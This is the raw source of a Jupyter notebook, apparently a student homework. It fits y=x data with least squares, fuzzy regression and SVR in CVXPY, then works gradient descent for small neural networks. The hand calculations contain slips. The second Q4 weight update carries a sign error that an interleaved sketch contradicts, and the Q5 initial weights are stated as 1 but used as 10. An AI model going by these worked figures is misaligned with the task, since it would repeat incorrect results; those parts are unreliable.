NN</a></span><ul class=\"toc-item\"><li><span><a href=\"#First-two-iterations-illustration\" data-toc-modified-id=\"First-two-iterations-illustration-6.5.1\">First two iterations illustration</a></span></li><li><span><a href=\"#Code\" data-toc-modified-id=\"Code-6.5.2\">Code</a></span></li></ul></li></ul></li><li><span><a href=\"#Q7-Discussion\" data-toc-modified-id=\"Q7-Discussion-7\">Q7 Discussion</a></span><ul class=\"toc-item\"><li><span><a href=\"#Discussion-of-Convergence-Issue\" data-toc-modified-id=\"Discussion-of-Convergence-Issue-7.1\">Discussion of Convergence Issue</a></span></li></ul></li><li><span><a href=\"#Q8-Bonus-Question\" data-toc-modified-id=\"Q8-Bonus-Question-8\">Q8 Bonus Question</a></span><ul class=\"toc-item\"><li><span><a href=\"#Simple-Linear-Regression\" data-toc-modified-id=\"Simple-Linear-Regression-8.1\">Simple Linear Regression</a></span></li><li><span><a href=\"#Fuzzy-Linear-Regression\" data-toc-modified-id=\"Fuzzy-Linear-Regression-8.2\">Fuzzy Linear Regression</a></span></li><li><span><a href=\"#Support-Vector-Regression\" data-toc-modified-id=\"Support-Vector-Regression-8.3\">Support Vector 
Regression</a></span></li><li><span><a href=\"#Single-layer-NN\" data-toc-modified-id=\"Single-layer-NN-8.4\">Single-layer NN</a></span></li></ul></li></ul></div>",
"_____no_output_____"
],
[
"## Q1 Simple Linear Regression",
"_____no_output_____"
],
[
"First, the training data has been visualized as below. ",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport numpy as np\nimport pandas as pd\nimport cvxpy as cp\nimport matplotlib.pyplot as plt\n\nar = np.array([[1, 1, 1, 1, 1, 1], # intercept\n [1, 2, 3, 4, 5, 6], # x\n [1, 2, 3, 4, 5, 6]]) # y\n\n# plot the dot points\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.title('Visualization of training observations')\nplt.axis('scaled')\nplt.show()",
"_____no_output_____"
]
],
[
[
"The data has been processed and the optimization problem (least sum of square) has been formulated. The estimate of $a$ (the slope) is very close to 1 and $b$ (intercept) is very close to 0. The fitted line has been plotted above the training set as well. ",
"_____no_output_____"
]
],
[
[
"# Data preprocessing\nX_lp = ar[[0, 1], :].T # transpose the array before modeling\ny_lp = ar[2].T\n\n# Define and solve the CVXPY problem.\nbeta = cp.Variable(X_lp.shape[1]) # return num of cols, 2 in total\ncost = cp.sum_squares(X_lp * beta - y_lp) # define cost function\nobj = cp.Minimize(cost) # define objective function\nprob = cp.Problem(obj)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nThe optimal value of loss is:\", prob.value)\nprint(\"\\nThe estimated of a (slope) is:\", beta.value[1],\n \"\\nThe estimate of b (intercept) is:\", beta.value[0])\n\nx = np.linspace(0, 10, 100)\ny = beta.value[1] * x + beta.value[0]\nplt.close('all')\nplt.plot(x, y, c='red', label='y = ax + b')\nplt.title('Fitted line using simple LR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"\nThe optimal value of loss is: 2.0532810769192338e-17\n\nThe estimated of a (slope) is: 0.9999999990246303 \nThe estimate of b (intercept) is: 4.218391830290713e-09\n"
]
],
[
[
"## Q2 Fuzzy Linear Regression",
"_____no_output_____"
],
[
"Same as HW2, the optimization problem has been formulated as below. Here I pick the threshold $\\alpha$ as $0.5$ for spread calculation. Similar to Q1, The estimate of $A_1$ (the slope) is 1 and $A_0$ (intercept) is 0. The spread of $A_1$ and $A_0$ have both been calculated. As expected, both spreads are 0 since the regression line fits perfectly to the training data and there is no need of spreads to cover any errors between the estimate $\\hat{y}$ and the true values $y$. \n\nThe fitted line has been plotted above the training set as well.",
"_____no_output_____"
]
],
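For reference, a compact statement of the linear program that the next cell solves (this simply restates the CVXPY constraints below in math form, with $\alpha$ denoting the centers and $c \ge 0$ the spreads; it is a sketch of the standard possibilistic-regression formulation, not an addition to the model):

$$
\min_{\alpha,\; c\ge 0}\ \sum_{i=1}^{N}\left(c_0 + c_1 x_i\right)
\quad\text{s.t.}\quad
y_i \le \alpha_0 + \alpha_1 x_i + (1-h)\left(c_0 + c_1 |x_i|\right),\qquad
y_i \ge \alpha_0 + \alpha_1 x_i - (1-h)\left(c_0 + c_1 |x_i|\right),\quad i=1,\dots,N.
$$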
[
[
"# Define threshold h (it has same meaning as the alpha in alpha-cut). Higher the h, wider the spread.\nh = 0.5\n# Define and solve the CVXPY problem.\nc = cp.Variable(X_lp.shape[1]) # for spread variables, A0 and A1\nalpha = cp.Variable(X_lp.shape[1]) # for center/core variables, A0 and A1\ncost = cp.sum(X_lp * c) # define cost function\nobj = cp.Minimize(cost) # define objective function\nconstraints = [c >= 0,\n y_lp <= (1 - h) * abs(X_lp) * c + X_lp * alpha, # abs operate on each elements of X_lp\n -y_lp <= (1 - h) * abs(X_lp) * c - X_lp * alpha]\n\nprob = cp.Problem(obj, constraints)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nThe optimal value of loss is:\", prob.value)\nprint(\"\\nThe center of A1 (slope) is:\", alpha.value[1],\n \"\\nThe spread of A1 (slope) is:\", c.value[1],\n \"\\nThe center of A0 (intercept) is:\", alpha.value[0],\n \"\\nThe spread of A0 (intercept) is:\", c.value[0])\n\nx = np.linspace(0, 10, 100)\ny = alpha.value[1] * x + alpha.value[0]\nplt.close('all')\nplt.plot(x, y, c='red', label='y = A1x + A0')\nplt.title('Fitted line using Fuzzy LR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"\nThe optimal value of loss is: 0.0\n\nThe center of A1 (slope) is: 1.0 \nThe spread of A1 (slope) is: 0.0 \nThe center of A0 (intercept) is: 0.0 \nThe spread of A0 (intercept) is: 0.0\n"
]
],
[
[
"## Q3 Support Vector Regression",
"_____no_output_____"
],
[
"In the course lecture, it was mentioned that the objective function of SVR is to ***minimize the sum of squares plus seek for flatness of the hyperplane.*** In $\\epsilon$-SV regression, our goal is to find a function $f(x)$ that has at most $\\epsilon$ deviation from the actually obtained targets $y_i$ for all the training data, and at the same time is as flat as possible. Flatness in the case means that one seeks a small $w$ and the approach here is to minimize the L2-norm. The problem can be written as a convex optimization problem:",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"Sometimes the convex optimization problem does not render feasible solution. We also may want to allow for some errors. Similarly to the loss function of “soft margin” in SVM, we introduce slack variables $ξ_i$, $ξ_i^*$ to cope with otherwise infeasible constraints of the optimization problem:",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"Here the constent $C$ should be $>0$ and determines the trade-off between the flatness of $f(x)$ and the amount up to which deviations larger than $\\epsilon$ are tolerated. The optimization problem is formulated with slack variables and in the program below, I defined $C$ as $\\frac{1}{N}$ where $N=6$ is the # of observations in the training set. The $\\epsilon$ here has been set to 0. \n\nFrom the output below, the estimated $w$ is very close to 1 and $b$ is very close to 0. ",
"_____no_output_____"
]
],
[
[
"# The constant C, defines the trade-off between the flatness of f and the amount up to which deviations larger than ε are tolerated.\n# When C gets bigger, the margin get softer. Here C is defined as 1/N. N is the # of observations.\nC = 1 / len(ar[1])\nepsilon = 0 # For this ε-SVR problem set ε=0\n# Define and solve the CVXPY problem.\nbw = cp.Variable(X_lp.shape[1]) # for b and w parameters in SVR. bw[0]=b, bw[1]=w\nepsilon1 = cp.Variable(X_lp.shape[0]) # for slack variables ξi\nepsilon2 = cp.Variable(X_lp.shape[0]) # for slack variables ξ*i\ncost = 1 / 2 * bw[1] ** 2 + C * cp.sum(epsilon1 + epsilon2) # define cost function\nobj = cp.Minimize(cost) # define objective function\nconstraints = [epsilon1 >= 0,\n epsilon2 >= 0,\n y_lp <= X_lp * bw + epsilon + epsilon1,\n -y_lp <= -(X_lp * bw) + epsilon + epsilon2]\n\nprob = cp.Problem(obj, constraints)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nThe estimate of w is:\", bw.value[1],\n \"\\nThe estimate of b is:\", bw.value[0], )",
"\nThe estimate of w is: 0.9999999970629421 \nThe estimate of b is: 9.380686338580135e-09\n"
]
],
[
[
"The fitted line has been plotted above the training set as well:",
"_____no_output_____"
]
],
[
[
"x = np.linspace(0, 10, 100)\ny = bw.value[1] * x + bw.value[0]\nplt.close('all')\nplt.plot(x, y, c='red', label='y = wx + b')\nplt.title('Fitted line using SVR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Q4 Single-layer NN",
"_____no_output_____"
],
[
"### First two iterations illustration",
"_____no_output_____"
],
[
"From the NN archiecture on Lecture 7 page 13, the network output $a$ can be denoted as:\n\n$$a=f(x)=f(wp+b)$$\nwhere\n$$x=wp+b\\quad f(x)=5x\\quad \\frac{\\partial f}{\\partial x}=5$$\nSince $b=1$,\n$$a=f(x)=f(wp+b)=5(wp+1)$$",
"_____no_output_____"
],
[
"Set the loss function $E$ as:\n$$ E=\\sum_{i=1}^N \\frac{1}{2}(T_i-a_i)^2 $$\nwhere $T_i$ is the target value for each input $i$ and $N$ is the number of observations in the training set. \n\nWe can find the gradient for $w$ by:\n\n$$\\frac{\\partial E}{\\partial w}=\\frac{\\partial E}{\\partial a}\\frac{\\partial a}{\\partial x}\\frac{\\partial x}{\\partial w}$$",
"_____no_output_____"
],
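As a quick numerical sketch of this chain rule (assuming the same six training points $p = T = 1,\dots,6$, bias $b=1$, and the initial $w=10$; the variable names below are illustrative only), the batch gradient for the first update can be computed directly:

```python
import numpy as np

p = np.arange(1, 7, dtype=float)   # inputs 1..6
T = p.copy()                       # targets (y = x)
w = 10.0                           # initial weight

a = 5 * (w * p + 1)                # forward pass: a = f(wp + b) with f(x) = 5x, b = 1
dE_dw = (a - T) * 5 * p            # per-sample gradient dE/dw via the chain rule
print(dE_dw.sum())                 # 22820.0, the batch sum used in the hand calculation below
print(0.1 * dE_dw.mean())          # 380.333..., the first step size for learning rate 0.1
```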
[
"**For the 1st iteration**, with initial value $w=10$:\n\n$$\n\\frac{\\partial E}{\\partial a}=a-T=5(wp_i+1)-T_i\\\\\n\\frac{\\partial f}{\\partial x}=5$$\n$$\\frac{\\partial x_1}{\\partial w}=p_1=1$$\n$$\\vdots$$\n$$\\frac{\\partial x_6}{\\partial w}=p_6=6$$\n\nFor $i=1$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*1+1)-1=54\\\\\n\\frac{\\partial E}{\\partial w}=54*5*1$$\nFor $i=2$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*2+1)-2=103\\\\\n\\frac{\\partial E}{\\partial w}=103*5*2$$\nFor $i=3$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*3+1)-3=152\\\\\n\\frac{\\partial E}{\\partial w}=152*5*3$$\nFor $i=4$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*4+1)-4=201\\\\\n\\frac{\\partial E}{\\partial w}=201*5*4$$\nFor $i=5$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*5+1)-5=250\\\\\n\\frac{\\partial E}{\\partial w}=250*5*5$$\nFor $i=6$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*6+1)-6=299\\\\\n\\frac{\\partial E}{\\partial w}=299*5*6$$\n\nThe sum of gradient for the batch training is:\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w})=(54*1+103*2+152*3+201*4+250*5+299*6)*5=22820\n$$\nAverage the sum of gradient by $N=6$ and the step size (learning rate=0.1) can be calculated as:\n$$s_1=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w})}{N}=380.333\n$$.",
"_____no_output_____"
],
[
"The new $w$ and output $a$ is calculated:\n$$w=10-380.333=-370.333\\\\\na=[-1846.667,-3698.333,-5550,-7401.667,-9253.333, -11105]\n$$",
"_____no_output_____"
],
[
"**For the 2nd iteration:**\n\nFor $i=1$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*1+1)-1=-1847.667\\\\\n\\frac{\\partial E}{\\partial w}=-1847.667*5*1$$\nFor $i=2$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*2+1)-2=-3700.333\\\\\n\\frac{\\partial E}{\\partial w}=-3700.333*5*2$$\nFor $i=3$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*3+1)-3=-5553\\\\\n\\frac{\\partial E}{\\partial w}=-5553*5*3$$\nFor $i=4$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*4+1)-4=-7405.667\\\\\n\\frac{\\partial E}{\\partial w}=-7405.667*5*4$$\nFor $i=5$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*5+1)-5=-9258.333\\\\\n\\frac{\\partial E}{\\partial w}=-9258.333*5*5$$\nFor $i=6$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*6+1)-6=-11111\\\\\n\\frac{\\partial E}{\\partial w}=-11111*5*6$$\n\nThe sum of gradient for the batch training is:\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w})=(-1847.667*1+-3700.333*2+-5553*3+-7405.667*4+-9258.333*5+-11111*6)*5=-842438.333\n$$\nAverage the sum of gradient by $N=6$ and the step size (learning rate=0.1) can be calculated as:\n$$s_1=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w})}{N}=-14040.639\n$$.",
"_____no_output_____"
],
[
"The new $w$ and output $a$ is calculated:\n$$w=-370.333-(-14040.638)=-13670.305\\\\\na=[68356.528, 136708.056, 205059.583, 273411.111, 341762.639, 410114.167]\n$$",
"_____no_output_____"
],
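A short script reproducing the two hand-worked updates above (a sketch under the same batch rule and learning rate of 0.1; it is kept separate from the reusable routine defined in the next cell):

```python
import numpy as np

p = np.arange(1, 7, dtype=float)   # inputs 1..6
T = p.copy()                       # targets
w, lr = 10.0, 0.1

for k in range(2):
    a = 5 * (w * p + 1)                   # forward pass
    grad = np.mean((a - T) * 5 * p)       # averaged batch gradient
    w = w - lr * grad                     # weight update
    print(f"iteration {k + 1}: w = {w:.3f}")
# prints w = -370.333 after the first update and w = 13670.306 after the second
```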
[
"### Code",
"_____no_output_____"
],
[
"**We can tell from the above that throughout the first 2 iterations, the updated fit $a$ more and more far away from the actual value. This is because of the learning rate=0.1 was set to be too large and cause the result to be oscillating and won't be able to converge.** Further discussion has been made in Q7 to explore for a proper learning rate in this case. \n\nFrom the code below, after 30 iterations the loss function value becomes larger and larger and won't be able to converge, which further proves the findings. ",
"_____no_output_____"
]
],
[
[
"def single_layer_NN(lr, w, maxiteration):\n \"\"\"lr - learning rate\\n\n w - initial value of w\\n\n maxiteration - define # of max iteration \"\"\"\n E0 = sum(0.5 * np.power((y_lp - 5 * (w * X_lp[:, 1] + 1)), 2)) # initialize Loss, before 1st iteration\n for i in range(maxiteration):\n if i > 0: # Starting 2nd iteration, E1 value give to E0\n E0 = E1 # Loss before iteration\n print(\"Iteration=\", i, \",\", \"Loss value=\", E0)\n gradient = np.mean((5 * (w * X_lp[:, 1] + 1) - y_lp) * 5 * X_lp[:, 1]) # calculate gradient\n step = gradient * lr # calculate step size\n w = w - step # refresh the weight\n E1 = sum(0.5 * np.power((5 * (w * X_lp[:, 1] + 1) - y_lp), 2)) # Loss after iteration\n a = 5 * (w * X_lp[:, 1] + 1) # the refreshed output\n\n if abs(E0 - E1) <= 0.0001:\n print('Break out of the loop and end at Iteration=', i,\n '\\nThe value of loss is:', E1,\n '\\nThe value of w is:', w)\n break\n return w, a, gradient\n\nw, a, gradient = single_layer_NN(lr=0.1, w=10, maxiteration=30)",
"Iteration= 0 , Loss value= 114465.5\nIteration= 1 , Loss value= 155978551.88888893\nIteration= 2 , Loss value= 212573833341.70184\nIteration= 3 , Loss value= 289704182060049.94\nIteration= 4 , Loss value= 3.948205279520827e+17\nIteration= 5 , Loss value= 5.3807731798658535e+20\nIteration= 6 , Loss value= 7.333134415107596e+23\nIteration= 7 , Loss value= 9.993890943267017e+26\nIteration= 8 , Loss value= 1.3620077109202842e+30\nIteration= 9 , Loss value= 1.8561989670860753e+33\nIteration= 10 , Loss value= 2.5297027159144115e+36\nIteration= 11 , Loss value= 3.4475807520519955e+39\nIteration= 12 , Loss value= 4.6985019097878616e+42\nIteration= 13 , Loss value= 6.403307647874708e+45\nIteration= 14 , Loss value= 8.726685573526139e+48\nIteration= 15 , Loss value= 1.1893078591103693e+52\nIteration= 16 , Loss value= 1.6208366530732709e+55\nIteration= 17 , Loss value= 2.2089414745067798e+58\nIteration= 18 , Loss value= 3.010434412711674e+61\nIteration= 19 , Loss value= 4.10274127125176e+64\nIteration= 20 , Loss value= 5.591381053763105e+67\nIteration= 21 , Loss value= 7.620159308471914e+70\nIteration= 22 , Loss value= 1.0385060028668781e+74\nIteration= 23 , Loss value= 1.4153178094209863e+77\nIteration= 24 , Loss value= 1.9288521165351336e+80\nIteration= 25 , Loss value= 2.628717354290996e+83\nIteration= 26 , Loss value= 3.582521889321206e+86\nIteration= 27 , Loss value= 4.882405126787482e+89\nIteration= 28 , Loss value= 6.653938359214699e+92\nIteration= 29 , Loss value= 9.068255201788373e+95\n"
]
],
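As a usage sketch only (the much smaller learning rate below is my own illustrative choice; the proper choice of learning rate is explored in Q7), the same routine does converge when the step is small enough:

```python
# Re-run the routine above with a smaller learning rate (illustrative value only)
w_small, a_small, _ = single_layer_NN(lr=0.001, w=10, maxiteration=100)
print("final w:", w_small)   # settles near -0.031, the least-squares slope for a = 5(wp + 1)
print("final fit:", a_small)
```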
[
[
"## Q5 Two-layer NN",
"_____no_output_____"
],
[
"### First two iterations illustration",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"The above structure will be used to model Q5, with $b_1=b_2=1$ and initial values $w_1=w_2=1$. For $f_1$, the activation function is sigmoid activation function. Since the sample data implies linear relationship, for $f_2$, a linear activation function (specifically, an **identify activation function**) has been chosen. The loss function $E$ has been the same as Q4:\n$$\nE=\\sum_{i=1}^N \\frac{1}{2}(T_i-a_2)^2\n$$\nwhere $T_i$ is the target value for each input $i$ and $N$ is the number of observations in the training set. \n\nThe output $a_1$ and $a_2$ can be denoted as:\n$$\na_1=f_1(w_1p+b) \\quad a_2=f_2(w_2a_1+b)\n$$\nwhere\n$$\nf_1(x)=\\frac{1}{1+e^{-x}} \\quad \\frac{\\partial f_1}{\\partial x}=f_1(1-f_1)\\\\\nand \\quad f_2(x)=x \\quad \\frac{\\partial f_2}{\\partial x}=1\n$$",
"_____no_output_____"
],
[
"We can find the gradient for $w_1$ and $w_2$ by:\n\n$$\n\\frac{\\partial E}{\\partial w_2}=\\frac{\\partial E}{\\partial a_2}\\frac{\\partial a_2}{\\partial n_2}\\frac{\\partial n_2}{\\partial w_2}=(w_2a_1+b-T)*1*a_1=(w_2a_1+1-T)a_1\n\\\\\n\\frac{\\partial E}{\\partial w_1}=\\frac{\\partial E}{\\partial a_2}\\frac{\\partial a_2}{\\partial a_1}\\frac{\\partial a_1}{\\partial n_1}\\frac{\\partial n_1}{\\partial w_1}=(w_2a_1+b-T)*w_2*a_1(1-a_1)*p\\\\=\\frac{\\partial E}{\\partial w_2}*w_2*(1-a_1)*p\n$$\nwhere\n$$\na_1=f_1(w_1p+b)=\\frac{1}{1+e^{-(w_1p+1)}}\n$$\n\n**We can see that the gradient of $w_1$ can be calculated from the gradient of $w_2$ and the gradient of both weights ($w_1$ and $w_2$) only relate to the input and the initial values of the weights!**",
"_____no_output_____"
],
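A small numeric sketch of these two backpropagation expressions for the first batch (assuming the same data, $b=1$, and initial $w_1=w_2=10$ as used in the worked iterations that follow; names are illustrative only):

```python
import numpy as np

p = np.arange(1, 7, dtype=float)
T = p.copy()
w1 = w2 = 10.0

a1 = 1 / (1 + np.exp(-(w1 * p + 1)))          # sigmoid layer output (about 1 for these inputs)
a2 = w2 * a1 + 1                              # identity output layer
dE_dw2 = (a2 - T) * a1                        # per-sample dE/dw2
dE_dw1 = (a2 - T) * w2 * a1 * (1 - a1) * p    # per-sample dE/dw1 via backprop
print(dE_dw2.mean())   # about 7.5, giving a step of 0.75 for learning rate 0.1
print(dE_dw1.mean())   # about 0, since the sigmoid is saturated and w1 barely moves
```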
[
"**For the 1st iteration**, \n\n$$\nFor\\quad i=1, 2, 3, 4, 5, 6, \\quad a_1=\\frac{1}{1+e^{-(w_1p_i+1)}}\\approx1\\\\\n$$\n\nFor $i=1:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-1=10\\\\\n\\frac{\\partial E}{\\partial w_2}=10*1*1=10,\\quad \\frac{\\partial E}{\\partial w_1}=10*10*(1-1)*1=0\n$$\nFor $i=2:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-2=9\\\\\n\\frac{\\partial E}{\\partial w_2}=9*1*1=9,\\quad \\frac{\\partial E}{\\partial w_1}=9*10*(1-1)*1=0\n$$\nFor $i=3:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-3=8\\\\\n\\frac{\\partial E}{\\partial w_2}=8*1*1=8,\\quad \\frac{\\partial E}{\\partial w_1}=8*10*(1-1)*1=0\n$$\nFor $i=4:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-4=7\\\\\n\\frac{\\partial E}{\\partial w_2}=7*1*1=7,\\quad \\frac{\\partial E}{\\partial w_1}=7*10*(1-1)*1=0\n$$\nFor $i=5:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-5=6\\\\\n\\frac{\\partial E}{\\partial w_2}=6*1*1=6,\\quad \\frac{\\partial E}{\\partial w_1}=6*10*(1-1)*1=0\n$$\nFor $i=6:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-6=5\\\\\n\\frac{\\partial E}{\\partial w_2}=5*1*1=5,\\quad \\frac{\\partial E}{\\partial w_1}=5*10*(1-1)*1=0\n$$",
"_____no_output_____"
],
[
"The sum of gradient for the batch training is:\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w_1})=0$$\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w_2})=10+9+8+7+6+5=45$$\nAverage the sum of gradient by $N=6$ and the step size (learning rate=0.1) can be calculated as:\n$$s_1=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w_1})}{N}=0$$\n\n$$s_2=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w_2})}{N}=0.75$$",
"_____no_output_____"
],
[
"The new weight $w_1$, $w_2$ and output $a_1$ and $a_2$ can be calculated. The value of $a_1$ and $a_2$ are both for all 6 observations. \n$$\nw_1=w_1-s_1=10-0=10,\\\\\nw_2=w_2-s_2=10-0.75=9.25\\\\\na_1=\\frac{1}{1+e^{-(w_1p_i+1)}}\\approx1, \\quad i\\in [1,2,3,4,5,6]\\\\\na_2=w_2a_1+b=9.25*1+1=10.25\n$$",
"_____no_output_____"
],
[
"**For the 2nd iteration**, \n\n$$\nFor\\quad i=1, 2, 3, 4, 5, 6, \\quad a_1=\\frac{1}{1+e^{-(w_1p_i+1)}}\\approx1\\\\\n$$\n\nFor $i=1:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-1=9.25\\\\\n\\frac{\\partial E}{\\partial w_2}=9.25*1*1=9.25,\\quad \\frac{\\partial E}{\\partial w_1}=9.25*9.25*(1-1)*1=0\n$$\nFor $i=2:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-2=8.25\\\\\n\\frac{\\partial E}{\\partial w_2}=8.25*1*1=8.25,\\quad \\frac{\\partial E}{\\partial w_1}=8.25*9.25*(1-1)*1=0\n$$\nFor $i=3:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-3=7.25\\\\\n\\frac{\\partial E}{\\partial w_2}=7.25*1*1=7.25,\\quad \\frac{\\partial E}{\\partial w_1}=7.25*9.25*(1-1)*1=0\n$$\nFor $i=4:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-4=6.25\\\\\n\\frac{\\partial E}{\\partial w_2}=6.25*1*1=6.25,\\quad \\frac{\\partial E}{\\partial w_1}=6.25*9.25*(1-1)*1=0\n$$\nFor $i=5:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-5=5.25\\\\\n\\frac{\\partial E}{\\partial w_2}=5.25*1*1=5.25,\\quad \\frac{\\partial E}{\\partial w_1}=5.25*9.25*(1-1)*1=0\n$$\nFor $i=6:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-6=4.25\\\\\n\\frac{\\partial E}{\\partial w_2}=4.25*1*1=4.25,\\quad \\frac{\\partial E}{\\partial w_1}=4.25*9.25*(1-1)*1=0\n$$",
"_____no_output_____"
],
[
"The sum of gradient for the batch training is:\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w_1})=0$$\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w_2})=9.25+8.25+7.25+6.25+5.25+4.25=40.5$$\nAverage the sum of gradient by $N=6$ and the step size (learning rate=0.1) can be calculated as:\n$$s_1=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w_1})}{N}=0$$\n\n$$s_2=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w_2})}{N}=0.675$$\nThe new weight $w_1$, $w_2$ and output $a_1$ and $a_2$ can be calculated, The value of $a_1$ and $a_2$ are both for all 6 observations:\n$$\nw_1=w_1-s_1=10-0=10,\\\\\nw_2=w_2-s_2=9.25-0.675=8.575\\\\\na_1=\\frac{1}{1+e^{-(w_1p_i+1)}}\\approx1, \\quad i\\in [1,2,3,4,5,6]\\\\\na_2=w_2a_1+b=8.575*1+1=9.575\n$$",
"_____no_output_____"
],
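And a short loop reproducing the two updates worked out above (same assumptions; this is a sketch kept separate from the reusable routine in the next cell):

```python
import numpy as np

p = np.arange(1, 7, dtype=float)
T = p.copy()
w1, w2, lr = 10.0, 10.0, 0.1

for k in range(2):
    a1 = 1 / (1 + np.exp(-(w1 * p + 1)))               # layer 1 (sigmoid)
    a2 = w2 * a1 + 1                                   # layer 2 (identity)
    g2 = np.mean((a2 - T) * a1)                        # batch gradient for w2
    g1 = np.mean((a2 - T) * w2 * a1 * (1 - a1) * p)    # batch gradient for w1 (backprop)
    w1, w2 = w1 - lr * g1, w2 - lr * g2
    print(f"iteration {k + 1}: w1 = {w1:.3f}, w2 = {w2:.3f}")
# prints w2 = 9.250 then 8.575, while w1 stays at 10.000 (to three decimals)
```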
[
"### Code",
"_____no_output_____"
],
[
"Below is the code to estimate all weights using batch training, with the stopping criteria as change in loss function less than 0.0001. We can tell the iteration stopped at Iteration 62 and $w_1=10$ while $w_2=2.511$. We can tell that the $w_1$ hardly changes throughout the iterations. I did not show the first 60 iteration results since it makes the report wordy. ",
"_____no_output_____"
]
],
[
[
"def linear_activation_NN(C, lr, w1, w2, maxiteration):\n # C - set the slope of the f2: f2(x)=Cx\n # lr - learning rate\n # w1 - initial value of w1\n # w2 - initial value of w2\n # maxiteration - define # of max iteration\n a1 = 1 / (1 + np.exp(-(w1 * X_lp[:, 1] + 1))) # initialize output1 - a1\n a2 = C * (w2 * a1 + 1) # initialize output2 - a2\n E0 = sum(0.5 * np.power(y_lp - a2, 2)) # initialize Loss, before 1st iteration\n for i in range(maxiteration):\n if i > 0: # Starting 2nd iteration, E1 value will give to E0\n E0 = E1 # Loss before iteration\n # print(\"Iteration=\", i, \",\", \"Loss value=\", E0)\n gradient_2 = np.mean((w2 * a1 + 1 - y_lp) * C * a1) # calculate gradient for w2\n gradient_1 = np.mean(\n (w2 * a1 + 1 - y_lp) * C * w2 * a1 * (1 - a1) * X_lp[:, 1]) # use BP to calculate gradient for w1\n # gradient_1 = np.mean(gradient_2 * w2 * (1 - a1) * X_lp[:, 1])\n step_1 = gradient_1 * lr # calculate step size\n step_2 = gradient_2 * lr\n w1 = w1 - step_1 # refresh w1\n w2 = w2 - step_2 # refresh w2\n a1 = 1 / (1 + np.exp(-(w1 * X_lp[:, 1] + 1))) # refresh a1\n a2 = C * (w2 * a1 + 1) # refresh a2\n E1 = sum(0.5 * np.power(y_lp - a2, 2)) # Loss after iteration\n\n if abs(E0 - E1) <= 0.0001:\n print('Break out of the loop and the iteration converge at Iteration=', i,\n '\\nThe value of loss is:', E1,\n '\\nThe value of w1 is:', w1,\n '\\nThe value of w2 is:', w2)\n break\n return w1, w2, a1, a2, gradient_1, gradient_2\n\nw1, w2, a1, a2, gradient_1, gradient_2 = linear_activation_NN(C=1, lr=0.1, w1=10, w2=10, maxiteration=100)",
